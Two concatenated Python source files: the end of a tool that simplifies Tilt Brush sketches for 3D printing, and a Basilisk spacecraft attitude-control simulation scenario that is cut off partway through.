num_texels = sum(counter.values())
assert width * height == num_texels
# Expand the colors into a 1d array, then turn into an Image
colors_array = np.zeros(shape=(num_texels, 3), dtype='uint8')
i = 0
# The sort used here only matters to humans when they look at the images
colors_and_counts = sorted(iter(counter.items()), key=by_color_similarity)
# colors_and_counts = sorted(counter.iteritems(), key=by_decreasing_usage)
for (color, count) in colors_and_counts:
colors_array[i:i+count] = color
i += count
colors_array.shape = (height, width, 3)
return Image.fromarray(colors_array, mode='RGB')
def get_quantized_image_pillow(im, num_colors):
MAXIMUM_COVERAGE = 1
print("Falling back to old color quantization")
return im.quantize(colors=num_colors, method=MAXIMUM_COVERAGE), 'pillow'
def get_quantized_image_pngquant(im, num_colors):
from PIL import Image
import subprocess
# pngquant errors out if its best solution is below this "quality"
QUALITY_MIN = 0 # never error out
# pngquant stops using colors when "quality" goes above this.
# I have no real feeling for what this number means in practice
QUALITY_MAX = 40
im.save('tmp_pngquant.png')
try:
subprocess.check_call([
'pngquant',
'--nofs', # no dithering
'--force',
'--quality', '%d-%d' % (QUALITY_MIN, QUALITY_MAX),
'-o', 'tmp_pngquant_out.png',
str(num_colors), '--',
'tmp_pngquant.png'
])
imq = Image.open('tmp_pngquant_out.png')
imq.load()
finally:
if os.path.exists('tmp_pngquant.png'):
os.unlink('tmp_pngquant.png')
if os.path.exists('tmp_pngquant_out.png'):
os.unlink('tmp_pngquant_out.png')
return imq, 'pngquant'
def get_quantized_image(im, num_colors):
try:
return get_quantized_image_pngquant(im, num_colors)
except subprocess.CalledProcessError as e:
print("Error running pngquant: %s" % e)
except OSError as e:
print("Missing pngquant: %s" % e)
print("Download pngquant.exe it and put it in your PATH.")
return get_quantized_image_pillow(im, num_colors)
def simplify_colors(tilt, num_colors, preserve_colors):
im = tilt_colors_to_image(tilt, max_aspect_ratio=4, preserve_colors=preserve_colors)
if num_colors < 0:
# Little hack to force use of pillow
imq, method = get_quantized_image_pillow(im, -num_colors)
else:
imq, method = get_quantized_image(im, num_colors)
def iter_rgb8(im):
return zip(im.getdata(0), im.getdata(1), im.getdata(2))
def get_imq_color(ipixel, data=imq.getdata(), palette=imq.getpalette()):
# Look up color in imq, which is awkward because it's palettized
palette_entry = data[ipixel]
r, g, b = palette[palette_entry * 3 : (palette_entry + 1) * 3]
return (r, g, b)
# Create table mapping unquantized rgb8 to quantized rgbaf
old_to_new = {}
idx = 0
for (old_color, group) in itertools.groupby(iter_rgb8(im)):
assert old_color not in old_to_new
old_to_new[old_color] = rgb8_to_rgbaf(get_imq_color(idx))
idx += len(list(group))
for stroke in tilt.sketch.strokes:
stroke.brush_color = old_to_new[rgbaf_to_rgb8(stroke.brush_color)]
if True:
import numpy as np
for old8, newf in old_to_new.items():
oldv = np.array(rgb8_to_rgbaf(old8)[0:3])
newv = np.array(newf[0:3])
err = oldv - newv
err = math.sqrt(np.dot(err, err))
if err > .2:
print("High color error: #%02x%02x%02x" % old8)
num_colors = len(set(map(tuple, list(old_to_new.values()))))
base, _ = os.path.splitext(tilt.filename)
im.save('%s_%s.png' % (base, 'orig'))
imq.save('%s_%s_%d.png' % (base, method, num_colors))
# ----------------------------------------------------------------------
# Split export into multiple .obj files
# ----------------------------------------------------------------------
def iter_aggregated_by_color(json_filename):
"""Yields TiltBrushMesh instances, each of a uniform color."""
from tiltbrush.export import iter_meshes, TiltBrushMesh
def by_color(m): return m.c[0]
meshes = iter_meshes(json_filename)
for (color, group) in itertools.groupby(sorted(meshes, key=by_color), key=by_color):
yield TiltBrushMesh.from_meshes(group)
def write_simple_obj(mesh, outf_name):
from io import StringIO
tmpf = StringIO()
for v in mesh.v:
tmpf.write("v %f %f %f\n" % v)
for (t1, t2, t3) in mesh.tri:
t1 += 1; t2 += 1; t3 += 1
tmpf.write("f %d %d %d\n" % (t1, t2, t3))
with file(outf_name, 'wb') as outf:
outf.write(tmpf.getvalue())
def split_json_into_obj(json_filename):
import struct
output_base = os.path.splitext(json_filename)[0].replace('_out', '')
meshes = list(iter_aggregated_by_color(json_filename))
meshes.sort(key=lambda m: len(m.v), reverse=True)
for i, mesh in enumerate(meshes):
# It's the "ignore normals" that does the most collapsing here.
mesh.collapse_verts(ignore=('uv0', 'uv1', 'c', 't', 'n'))
mesh.remove_degenerate()
(r, g, b, a) = struct.unpack('4B', struct.pack('I', mesh.c[0]))
assert a == 255, (r, g, b, a)
hex_color = '%02x%02x%02x' % (r, g, b)
outf_name = '%s %02d %s.obj' % (output_base, i, hex_color)
write_simple_obj(mesh, outf_name)
msgln("Wrote %s" % outf_name)
# ----------------------------------------------------------------------
# Main
# ----------------------------------------------------------------------
def process_tilt(filename, args):
msg("Load tilt")
tilt = Tilt(filename)
msg("Load strokes")
tilt.sketch.strokes
msg("")
if args.debug:
msg("Clone strokes")
before_strokes = [s.clone() for s in tilt.sketch.strokes]
# Do this before color quantization, because it removes strokes (and their colors)
if args.convert_brushes:
convert_brushes(tilt, BRUSH_REPLACEMENTS)
if args.remove_stray_strokes is not None:
remove_stray_strokes(tilt, args.remove_stray_strokes,
BrushLookup.get().get_unique_guid('Wire'))
if args.pos_error_tolerance > 0:
reduce_control_points(tilt, args.pos_error_tolerance)
if args.simplify_colors is not None:
simplify_colors(tilt, num_colors=args.simplify_colors, preserve_colors=args.preserve_colors)
if args.debug:
final_strokes = []
# interleave them so it renders semi-nicely...
for before, after in itertools.zip_longest(before_strokes, tilt.sketch.strokes):
if before is not None:
for cp in before.controlpoints:
cp.position[1] += 10
final_strokes.append(before)
if after is not None:
final_strokes.append(after)
tilt.sketch.strokes[:] = final_strokes
tilt.write_sketch()
msgln("Wrote %s" % os.path.basename(tilt.filename))
def main():
import argparse
parser = argparse.ArgumentParser(usage='''%(prog)s [ files ]
Process .tilt files to get them ready for 3D printing.
You should generally do the steps in this order:
1. Use --remove-stray-strokes (which actually just colors them magenta).
Manually delete the strokes you don't want to keep.
2. Experiment with different values for --simplify-colors. Use
--preserve-color option to force a color to remain present.
3. Use --convert-brushes and --pos-error-tolerance.
4. Load .tilt files in Tilt Brush, and export to .json
5. Convert from .json -> multiple .obj files
''')
def hex_color(arg):
arg = arg.lower()
m = re.match(r'^#?([0-9a-f]{2})([0-9a-f]{2})([0-9a-f]{2})$', arg)
if m is not None:
return tuple(int(m.group(i), 16) for i in (1, 2, 3))
else:
raise argparse.ArgumentTypeError("Must be exactly hex 6 digits: %r" % arg)
parser.add_argument(
'--debug', action='store_true',
help='For debugging: put both the original and modified strokes in the resulting .tilt file')
parser.add_argument(
'--remove-stray-strokes', metavar='float', type=float, default=None,
help="Replace strokes that are far away from the sketch with magenta wire. Argument is the number of standard deviations; 5.0 is a reasonable starting point.")
parser.add_argument(
'--simplify-colors', type=int, metavar='N',
help='Simplify down to N colors. Use a negative number to try the alternate algorithm.')
parser.add_argument(
'--preserve-color', dest='preserve_colors', type=hex_color, action='append',
default=[],
help='Color to preserve, as a hex string like #ff00ff')
parser.add_argument(
'--convert-brushes', action='store_true',
help='Convert brushes to 3d-printable ones')
parser.add_argument(
'--pos-error-tolerance', type=float, default=0,
help='Allowable positional error when simplifying strokes, as a fraction of stroke width. If 0, do not simplify. .1 to .3 are good values. (default %(default)s)')
parser.add_argument('-o', dest='output_file', help='Name of output file (optional)')
parser.add_argument('files', type=str, nargs='+', help='File(s) to hack')
args = parser.parse_args()
for i, orig_filename in enumerate(args.files):
if orig_filename.endswith('.tilt'):
base, ext = os.path.splitext(orig_filename)
if i == 0 and args.output_file is not None:
working_filename = args.output_file
else:
working_filename = base + '_out' + ext
shutil.copyfile(orig_filename, working_filename)
process_tilt(working_filename, args)
elif orig_filename.endswith('.json'):
split_json_into_obj(orig_filename)
if __name__=='__main__':
main()
| 1.929688 | 2 |
src/tests/scenarios/Maxwell_Main.py | ian-cooke/basilisk_mag | 0 | 11083 | <reponame>ian-cooke/basilisk_mag<gh_stars>0
''' '''
'''
ISC License
Copyright (c) 2016, Autonomous Vehicle Systems Lab, University of Colorado at Boulder
Permission to use, copy, modify, and/or distribute this software for any
purpose with or without fee is hereby granted, provided that the above
copyright notice and this permission notice appear in all copies.
THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
'''
#
# Basilisk Scenario Script and Integrated Test
#
# Purpose: Integrated test of the spacecraftPlus(), extForceTorque, simpleNav() and
# MRP_Feedback() modules. Illustrates a 6-DOV spacecraft detumbling in orbit.
# This scenario is the same as scenarioAttitudeControl, but with the
# difference that here the control and dynamics are executed at different
# frequencies or time steps.
# Author: <NAME>
# Creation Date: Nov. 25, 2016
#
import pytest
import os
import numpy as np
import matplotlib.pyplot as plt
from datetime import datetime
from Basilisk import __path__
# import general simulation support files
from Basilisk.utilities import SimulationBaseClass
from Basilisk.utilities import unitTestSupport # general support file with common unit test functions
from Basilisk.utilities import simIncludeGravBody
from Basilisk.utilities import macros
from Basilisk.utilities import orbitalMotion
from Basilisk.utilities import simIncludeRW
from Basilisk.utilities import fswSetupRW
# import simulation related support
from Basilisk.simulation import spacecraftPlus
from Basilisk.simulation import extForceTorque
from Basilisk.simulation import simMessages
from Basilisk.simulation import sim_model
from Basilisk.simulation import simple_nav
from Basilisk.simulation import mag_meter
from Basilisk.simulation import imu_sensor
from Basilisk.simulation import coarse_sun_sensor
from Basilisk.simulation import reactionWheelStateEffector
from Basilisk.simulation import rwVoltageInterface
from Basilisk.simulation import torqueRodDynamicEffector
# import FSW Algorithm related support
from Basilisk.fswAlgorithms import B_DOT
from Basilisk.fswAlgorithms import inertial3D
from Basilisk.fswAlgorithms import attTrackingError
from Basilisk.fswAlgorithms import rwMotorVoltage
from Basilisk.fswAlgorithms import rwMotorTorque
from Basilisk.fswAlgorithms import maxwellLS
from Basilisk.fswAlgorithms import QUAT_PD
from Basilisk.fswAlgorithms import sunSafePoint
# import message declarations
from Basilisk.fswAlgorithms import fswMessages
bskPath = __path__[0]
from Basilisk import pyswice
def run(show_plots, detumble, saturate, sunpoint, useUnmodeledTorque, useJitterSimple, useRWVoltageIO):
'''Call this routine directly to run the tutorial scenario.'''
# Create simulation variable names
dynTaskName = "dynTask"
dynProcessName = "dynProcess"
fswTaskName = "fswTask"
fswProcessName = "fswProcess"
# Create a sim module as an empty container
scSim = SimulationBaseClass.SimBaseClass()
scSim.TotalSim.terminateSimulation()
# set the simulation time variable used later on
simulationTime = macros.min2nano(2)
#
# create the simulation process
#
dynProcess = scSim.CreateNewProcess(dynProcessName)
fswProcess = scSim.CreateNewProcess(fswProcessName)
# Process message interfaces.
# this step is used to copy messages between the dyn and fsw processes
# as long as the message has the same name, it will get copied over automatically
dyn2FSWInterface = sim_model.SysInterface()
fsw2DynInterface = sim_model.SysInterface()
dyn2FSWInterface.addNewInterface(dynProcessName, fswProcessName)
fsw2DynInterface.addNewInterface(fswProcessName, dynProcessName)
fswProcess.addInterfaceRef(dyn2FSWInterface)
dynProcess.addInterfaceRef(fsw2DynInterface)
# create the dynamics task and specify the integration update time
simTimeStep = macros.sec2nano(0.1)
dynProcess.addTask(scSim.CreateNewTask(dynTaskName, simTimeStep))
fswTimeStep = macros.sec2nano(0.1)
fswProcess.addTask(scSim.CreateNewTask(fswTaskName, fswTimeStep))
# if this scenario is to interface with the BSK Viz, uncomment the following lines
# unitTestSupport.enableVisualization(scSim, dynProcess, simProcessName, 'earth') # The Viz only support 'earth', 'mars', or 'sun'
#
# setup the simulation tasks/objects
#
# initialize spacecraftPlus object and set properties
scObject = spacecraftPlus.SpacecraftPlus()
scObject.ModelTag = "spacecraftBody"
# define the simulation inertia
I = [0.0511, 0., 0.,
0., 0.1522, 0.,
0., 0., 0.1179]
scObject.hub.mHub = 10.0 # kg - spacecraft mass
scObject.hub.r_BcB_B = [[0.0], [0.0], [0.0]] # m - position vector of body-fixed point B relative to CM
scObject.hub.IHubPntBc_B = unitTestSupport.np2EigenMatrix3d(I)
# add spacecraftPlus object to the simulation process
scSim.AddModelToTask(dynTaskName, scObject)
# clear prior gravitational body and SPICE setup definitions
gravFactory = simIncludeGravBody.gravBodyFactory()
gravBodies = gravFactory.createBodies(['earth','sun','moon'])
# setup Earth Gravity Body
earth = gravBodies['earth']
earth.isCentralBody = True # ensure this is the central gravitational body
mu = earth.mu
simIncludeGravBody.loadGravFromFile(bskPath + '/supportData/LocalGravData/GGM03S.txt'
, earth.spherHarm
, 100)
# attach gravity model to spaceCraftPlus
scObject.gravField.gravBodies = spacecraftPlus.GravBodyVector(gravFactory.gravBodies.values())
# setup simulation start data/time
timeInitString = "2020 March 1 00:28:30.0"
spiceTimeStringFormat = '%Y %B %d %H:%M:%S.%f'
timeInit = datetime.strptime(timeInitString, spiceTimeStringFormat)
# setup SPICE module
gravFactory.createSpiceInterface(bskPath + '/supportData/EphemerisData/', timeInitString)
gravFactory.spiceObject.zeroBase = 'Earth'
# add SPICE interface to task list
scSim.AddModelToTask(dynTaskName, gravFactory.spiceObject, None, -1)
# attach gravity model to spaceCraftPlus
scObject.gravField.gravBodies = spacecraftPlus.GravBodyVector(gravFactory.gravBodies.values())
#
# set initial Spacecraft States
#
# setup the orbit using classical orbit elements
oe = orbitalMotion.ClassicElements()
orbitRadius = 550.0
oe.a = (6371.0 + orbitRadius) * 1000.0 # meters
oe.e = 0.0001
oe.i = 45 * macros.D2R
oe.Omega = 0.0 * macros.D2R
oe.omega = 0.0 * macros.D2R
oe.f = 180.0 * macros.D2R
rN, vN = orbitalMotion.elem2rv(mu, oe)
scObject.hub.r_CN_NInit = unitTestSupport.np2EigenVectorXd(rN) # m - r_CN_N
scObject.hub.v_CN_NInit = unitTestSupport.np2EigenVectorXd(vN) # m/s - v_CN_N
scObject.hub.sigma_BNInit = [[0.1], [0.2], [-0.3]] # sigma_BN_B
if detumble:
scObject.hub.omega_BN_BInit = [[13*macros.D2R], [13*macros.D2R], [13*macros.D2R]] # rad/s - omega_BN_B
if sunpoint:
scObject.hub.omega_BN_BInit = [[0.001*macros.D2R], [0.001*macros.D2R], [0.001*macros.D2R]] # rad/s - omega_BN_B
if saturate or sunpoint:
#
# Add RW devices
#
rwFactory = simIncludeRW.rwFactory()
# store the RW dynamical model type
varRWModel = rwFactory.BalancedWheels
if useJitterSimple:
varRWModel = rwFactory.JitterSimple
# create each RW by specifying the RW type, the spin axis gsHat, plus optional arguments
RW1 = rwFactory.create('NanoAvionics_RW0', [0.422618261740699, 0.906307787036650, 0], maxMomentum=0.02, Omega=0. # RPM
, RWModel=varRWModel,
)
RW2 = rwFactory.create('NanoAvionics_RW0', [0.422618261740699, 0, 0.906307787036650], maxMomentum=0.02, Omega=0. # RPM
, RWModel=varRWModel,
)
RW3 = rwFactory.create('NanoAvionics_RW0', [0.422618261740699, -0.906307787036650, 0], maxMomentum=0.02, Omega=0. # RPM
, RWModel=varRWModel,
)
RW4 = rwFactory.create('NanoAvionics_RW0', [0.422618261740699, 0, -0.906307787036650], maxMomentum=0.02, Omega=0.
, RWModel=varRWModel,
)
numRW = rwFactory.getNumOfDevices()
# create RW object container and tie to spacecraft object
rwStateEffector = reactionWheelStateEffector.ReactionWheelStateEffector()
rwStateEffector.InputCmds = "reactionwheel_cmds"
rwFactory.addToSpacecraft("ReactionWheels", rwStateEffector, scObject)
# add RW object array to the simulation process
scSim.AddModelToTask(dynTaskName, rwStateEffector, None, 2)
if useRWVoltageIO:
rwVoltageIO = rwVoltageInterface.RWVoltageInterface()
rwVoltageIO.ModelTag = "rwVoltageInterface"
# set module parameters(s)
rwVoltageIO.setGains(np.array([0.2 / 10.] * 3)) # [Nm/V] conversion gain
# Add test module to runtime call list
scSim.AddModelToTask(dynTaskName, rwVoltageIO)
# add the simple Navigation sensor module. This sets the SC attitude, rate, position
# velocity navigation message
sNavObject = simple_nav.SimpleNav()
sNavObject.ModelTag = "SimpleNavigation"
scSim.AddModelToTask(dynTaskName, sNavObject)
#
# setup sensors
#
# Add IMU Sensor
ImuSensor = imu_sensor.ImuSensor()
ImuSensor.ModelTag = "imusensor"
r_SB_B = np.array([0.0, 0.0, 0.0]) # Sensor position wrt body frame origin
ImuSensor.sensorPos_B = np.array(r_SB_B)
# IMU Parameters
accelLSBIn = 0.0 # Not Used
gyroLSBIn = 0.0001 # Discretization value (least significant bit)
senRotBiasIn = 0.0 # Rotational sensor bias
senRotMaxIn = 50.0 # Gyro saturation value
gyroScale = [1., 1., 1.] # Scale factor for each axis
errorBoundsGryo = [0] * 3 # Bounds random walk
gyroNoise = 0.000 # Noise
ImuSensor.setLSBs(accelLSBIn, gyroLSBIn)
ImuSensor.senRotBias = np.array([senRotBiasIn] * 3)
ImuSensor.senRotMax = senRotMaxIn
ImuSensor.gyroScale = np.array(gyroScale)
ImuSensor.PMatrixGyro = np.eye(3) * gyroNoise
ImuSensor.walkBoundsGyro = np.array(errorBoundsGryo)
# add IMU to Simulation Process
scSim.AddModelToTask(dynTaskName, ImuSensor)
# Add Mag Meter
MagMeter = mag_meter.MagMeter()
MagMeter.ModelTag = "MagMeter"
MagMeterNoise = 0.00000
MagMeterBias = 0.0000
ImuSensor.senRotBias = np.array([MagMeterBias] * 3)
MagMeter.PMatrix = np.eye(3) * MagMeterNoise
MagMeter.inclination = oe.i
MagMeter.orbitRadius = oe.a / 1000 # 6371.0 + orbitRadius
scSim.AddModelToTask(dynTaskName, MagMeter)
# # Add Coarse Sun Sensors
cssConstellation = coarse_sun_sensor.CSSConstellation()
CSSOrientationList = [
[0.866, 0.000, -0.500], # 1 - 13 G
[0.866, -0.433, 0.250], # 2 - 14 G
[0.866, 0.433, 0.250], # 3 - 12 G
[0.500, 0.866, 0.000], # 4 - 10 G
[0.500, -0.866, 0.000], # 5 - 7 G
[0.000, -0.866, -0.500], # 6 - 9 G
[0.500, 0.866, 0.000], # 7 - 5 G
[0.000, 0.866, -0.500], # 8 - 11 G
[0.000, 0.866, 0.500], # 9 - 6 G
[0.500, -0.866, 0.000], # 10 - 4 G
[0.000, -0.866, 0.500], # 11 - 8 G
[0.866, -0.433, -0.250], # 12 - 3 G
[0.866, 0.000, 0.500], # 13 - 1 G
[0.866, 0.433, -0.250] # 14 - 2 G
]
for CSSHat in CSSOrientationList:
newCSS = coarse_sun_sensor.CoarseSunSensor()
newCSS.minOutput = 0.
newCSS.senNoiseStd = 0.00
newCSS.nHat_B = CSSHat
cssConstellation.appendCSS(newCSS)
cssConstellation.outputConstellationMessage = "css_sensors_data"
scSim.AddModelToTask(dynTaskName, cssConstellation)
# Add the normals to the vehicle Config data struct
cssConstVehicle = fswMessages.CSSConfigFswMsg()
totalCSSList = []
for CSSHat in CSSOrientationList:
newCSS = fswMessages.CSSUnitConfigFswMsg()
newCSS.nHat_B = CSSHat
newCSS.CBias = 1.0
totalCSSList.append(newCSS)
cssConstVehicle.nCSS = len(CSSOrientationList)
cssConstVehicle.cssVals = totalCSSList
# setup Sun Position
pyswice.furnsh_c(gravFactory.spiceObject.SPICEDataPath + 'de430.bsp') # solar system bodies
pyswice.furnsh_c(gravFactory.spiceObject.SPICEDataPath + 'naif0011.tls') # leap second file
pyswice.furnsh_c(gravFactory.spiceObject.SPICEDataPath + 'de-403-masses.tpc') # solar system masses
pyswice.furnsh_c(gravFactory.spiceObject.SPICEDataPath + 'pck00010.tpc') # generic Planetary Constants Kernel
sunPositionMsg = simMessages.SpicePlanetStateSimMsg()
sunInitialState = 1000 * pyswice.spkRead('SUN', timeInitString, 'J2000', 'EARTH')
rN_sun = sunInitialState[0:3] # meters
vN_sun = sunInitialState[3:6] # m/s
sunPositionMsg.PositionVector = rN_sun
sunPositionMsg.VelocityVector = vN_sun
#
# setup the FSW algorithm tasks
#
# setup inertial3D guidance module
inertial3DConfig = inertial3D.inertial3DConfig()
inertial3DWrap = scSim.setModelDataWrap(inertial3DConfig)
inertial3DWrap.ModelTag = "inertial3D"
scSim.AddModelToTask(fswTaskName, inertial3DWrap, inertial3DConfig)
inertial3DConfig.sigma_R0N = [0., 0., 0.] # set the desired inertial orientation
inertial3DConfig.outputDataName = "guidanceInertial3D"
# setup the attitude tracking error evaluation module
attErrorConfig = attTrackingError.attTrackingErrorConfig()
attErrorWrap = scSim.setModelDataWrap(attErrorConfig)
attErrorWrap.ModelTag = "attErrorInertial3D"
scSim.AddModelToTask(fswTaskName, attErrorWrap, attErrorConfig)
attErrorConfig.outputDataName = "attErrorInertial3DMsg"
attErrorConfig.inputRefName = inertial3DConfig.outputDataName
attErrorConfig.inputNavName = sNavObject.outputAttName
if detumble:
# setup the MRP Feedback control module
bdotControlConfig = B_DOT.B_DOTConfig()
bdotControlWrap = scSim.setModelDataWrap(bdotControlConfig)
bdotControlWrap.ModelTag = "B_DOT"
scSim.AddModelToTask(fswTaskName, bdotControlWrap, bdotControlConfig)
bdotControlConfig.inputMagMeterName = MagMeter.outputStateMessage
bdotControlConfig.vehConfigInMsgName = "vehicleConfigName"
bdotControlConfig.outputDataName = "LrRequested"
bdotControlConfig.K_detumble = 1000.0
if saturate:
bdotControlConfig.use_rw_wheels = 1
bdotControlConfig.rwParamsInMsgName = "rwa_config_data_parsed"
bdotControlConfig.inputRWSpeedsName = rwStateEffector.OutputDataString
# add module that maps the Lr control torque into the RW motor torques
rwMotorTorqueConfig = rwMotorTorque.rwMotorTorqueConfig()
rwMotorTorqueWrap = scSim.setModelDataWrap(rwMotorTorqueConfig)
rwMotorTorqueWrap.ModelTag = "rwMotorTorque"
scSim.AddModelToTask(dynTaskName, rwMotorTorqueWrap, rwMotorTorqueConfig)
# Initialize the test module msg names
if useRWVoltageIO:
rwMotorTorqueConfig.outputDataName = "rw_torque_Lr"
else:
rwMotorTorqueConfig.outputDataName = rwStateEffector.InputCmds
rwMotorTorqueConfig.inputVehControlName = bdotControlConfig.outputDataName
rwMotorTorqueConfig.rwParamsInMsgName = bdotControlConfig.rwParamsInMsgName
# Make the RW control all three body axes
controlAxes_B = [
1, 0, 0,
0, 1, 0,
0, 0, 1
]
rwMotorTorqueConfig.controlAxes_B = controlAxes_B
if useRWVoltageIO:
fswRWVoltageConfig = rwMotorVoltage.rwMotorVoltageConfig()
fswRWVoltageWrap = scSim.setModelDataWrap(fswRWVoltageConfig)
fswRWVoltageWrap.ModelTag = "rwMotorVoltage"
# Add test module to runtime call list
scSim.AddModelToTask(dynTaskName, fswRWVoltageWrap, fswRWVoltageConfig)
# Initialize the test module configuration data
fswRWVoltageConfig.torqueInMsgName = rwMotorTorqueConfig.outputDataName
fswRWVoltageConfig.rwParamsInMsgName = bdotControlConfig.rwParamsInMsgName
fswRWVoltageConfig.voltageOutMsgName = rwVoltageIO.rwVoltageInMsgName
# set module parameters
fswRWVoltageConfig.VMin = 0.0 # Volts
fswRWVoltageConfig.VMax = 5.0 # Volts
else:
bdotControlConfig.use_rw_wheels = 0
torqueRodConfig = torqueRodDynamicEffector.torqueRodDynamicEffector()
# torqueRodWrap = scSim.setModelDataWrap(torqueRodConfig)
torqueRodConfig.ModelTag = "torqueRods"
torqueRodConfig.magFieldMsgName = MagMeter.outputStateMessage
torqueRodConfig.cmdTorqueRodsMsgName = bdotControlConfig.outputDataName
torqueRodConfig.MaxDipoleMoment = 0.11 # [Am^2]
scObject.addDynamicEffector(torqueRodConfig)
scSim.AddModelToTask(dynTaskName, torqueRodConfig)
if sunpoint:
# Add Maxwell LS
sunVectorConfig = maxwellLS.maxwellLSConfig()
sunVectorWrap = scSim.setModelDataWrap(sunVectorConfig)
sunVectorWrap.ModelTag = "maxwellLS"
sunVectorConfig.cssDataInMsgName = "css_sensors_data"
sunVectorConfig.cssConfigInMsgName = "css_config_data"
sunVectorConfig.navStateOutMsgName = "css_nav_sunHeading"
sunVectorConfig.sunpointOutMsgName = "sun_direction"
sunVectorConfig.sensorUseThresh = 0.15
scSim.AddModelToTask(fswTaskName, sunVectorWrap, sunVectorConfig)
# setup the QUAT PD control module
quatControlConfig = QUAT_PD.QUAT_PDConfig()
quatControlWrap = scSim.setModelDataWrap(quatControlConfig)
quatControlWrap.ModelTag = "QUAT_PD"
scSim.AddModelToTask(fswTaskName, quatControlWrap, quatControlConfig)
quatControlConfig.inputSunName = "sun_direction"
quatControlConfig.inputAttName = sNavObject.outputAttName
quatControlConfig.inputGuidName = attErrorConfig.outputDataName
quatControlConfig.inputRatesName = ImuSensor.OutputDataMsg
quatControlConfig.vehConfigInMsgName = "vehicleConfigName"
quatControlConfig.outputDataName = "LrRequested"
quatControlConfig.rwParamsInMsgName = "rwa_config_data_parsed"
quatControlConfig.inputRWSpeedsName = rwStateEffector.OutputDataString
quatControlConfig.outputErrorName = "controlError"
quatControlConfig.K = 0.015
quatControlConfig.P = 0.01
# add module that maps the Lr control torque into the RW motor torques
rwMotorTorqueConfig = rwMotorTorque.rwMotorTorqueConfig()
rwMotorTorqueWrap = scSim.setModelDataWrap(rwMotorTorqueConfig)
rwMotorTorqueWrap.ModelTag = "rwMotorTorque"
scSim.AddModelToTask(dynTaskName, rwMotorTorqueWrap, rwMotorTorqueConfig)
# Initialize the test module msg names
if useRWVoltageIO:
rwMotorTorqueConfig.outputDataName = "rw_torque_Lr"
else:
rwMotorTorqueConfig.outputDataName = rwStateEffector.InputCmds
rwMotorTorqueConfig.inputVehControlName = quatControlConfig.outputDataName
rwMotorTorqueConfig.rwParamsInMsgName = quatControlConfig.rwParamsInMsgName
# Make the RW control all three body axes
controlAxes_B = [
1, 0, 0,
0, 1, 0,
0, 0, 1
]
rwMotorTorqueConfig.controlAxes_B = controlAxes_B
if useRWVoltageIO:
fswRWVoltageConfig = rwMotorVoltage.rwMotorVoltageConfig()
fswRWVoltageWrap = scSim.setModelDataWrap(fswRWVoltageConfig)
fswRWVoltageWrap.ModelTag = "rwMotorVoltage"
# Add test module to runtime call list
scSim.AddModelToTask(dynTaskName, fswRWVoltageWrap, fswRWVoltageConfig)
# Initialize the test module configuration data
fswRWVoltageConfig.torqueInMsgName = rwMotorTorqueConfig.outputDataName
fswRWVoltageConfig.rwParamsInMsgName = quatControlConfig.rwParamsInMsgName
fswRWVoltageConfig.voltageOutMsgName = rwVoltageIO.rwVoltageInMsgName
# set module parameters
fswRWVoltageConfig.VMin = 0.0 # Volts
fswRWVoltageConfig.VMax = 5.0 # Volts
#
# Setup data logging before the simulation is initialized
#
numDataPoints = 100000
samplingTime = simulationTime / (numDataPoints - 1)
if detumble:
# scSim.TotalSim.logThisMessage(bdotControlConfig.outputDataName, samplingTime)
# scSim.TotalSim.logThisMessage(attErrorConfig.outputDataName, samplingTime)
# scSim.TotalSim.logThisMessage(sNavObject.outputTransName, samplingTime)
# scSim.TotalSim.logThisMessage(sNavObject.outputAttName, samplingTime)
scSim.TotalSim.logThisMessage(ImuSensor.OutputDataMsg, samplingTime)
scSim.TotalSim.logThisMessage(MagMeter.outputStateMessage, samplingTime)
scSim.TotalSim.logThisMessage(bdotControlConfig.inputMagMeterName, samplingTime)
# create the FSW vehicle configuration message
vehicleConfigOut = fswMessages.VehicleConfigFswMsg()
vehicleConfigOut.ISCPntB_B = I # use the same inertia in the FSW algorithm as in the simulation
unitTestSupport.setMessage(scSim.TotalSim,
fswProcessName,
bdotControlConfig.vehConfigInMsgName,
vehicleConfigOut)
if saturate:
scSim.TotalSim.logThisMessage(bdotControlConfig.inputRWSpeedsName, samplingTime)
rwOutName = ["rw_config_0_data", "rw_config_1_data", "rw_config_2_data", "rw_config_3_data"]
for item in rwOutName:
scSim.TotalSim.logThisMessage(item, samplingTime)
if useRWVoltageIO:
scSim.TotalSim.logThisMessage(fswRWVoltageConfig.voltageOutMsgName, samplingTime)
# FSW RW configuration message
# use the same RW states in the FSW algorithm as in the simulation
fswSetupRW.clearSetup()
for key, rw in rwFactory.rwList.iteritems():
fswSetupRW.create(unitTestSupport.EigenVector3d2np(rw.gsHat_B), rw.Js, 0.2)
fswSetupRW.writeConfigMessage(bdotControlConfig.rwParamsInMsgName, scSim.TotalSim, dynProcessName)
if sunpoint:
scSim.TotalSim.logThisMessage(cssConstellation.outputConstellationMessage, samplingTime)
scSim.TotalSim.logThisMessage(sunVectorConfig.sunpointOutMsgName, samplingTime)
scSim.TotalSim.logThisMessage(attErrorConfig.outputDataName, samplingTime)
scSim.TotalSim.logThisMessage(sNavObject.outputAttName, samplingTime)
scSim.TotalSim.logThisMessage(quatControlConfig.inputRWSpeedsName, samplingTime)
scSim.TotalSim.logThisMessage(quatControlConfig.outputErrorName, samplingTime)
scSim.TotalSim.logThisMessage(attErrorConfig.outputDataName, samplingTime)
rwOutName = ["rw_config_0_data", "rw_config_1_data", "rw_config_2_data", "rw_config_3_data"]
for item in rwOutName:
scSim.TotalSim.logThisMessage(item, samplingTime)
if useRWVoltageIO:
scSim.TotalSim.logThisMessage(fswRWVoltageConfig.voltageOutMsgName, samplingTime)
# create the FSW vehicle configuration message
vehicleConfigOut = fswMessages.VehicleConfigFswMsg()
vehicleConfigOut.ISCPntB_B = I # use the same inertia in the FSW algorithm as in the simulation
unitTestSupport.setMessage(scSim.TotalSim,
fswProcessName,
quatControlConfig.vehConfigInMsgName,
vehicleConfigOut)
# FSW RW configuration message
# use the same RW states in the FSW algorithm as in the simulation
fswSetupRW.clearSetup()
for key, rw in rwFactory.rwList.iteritems():
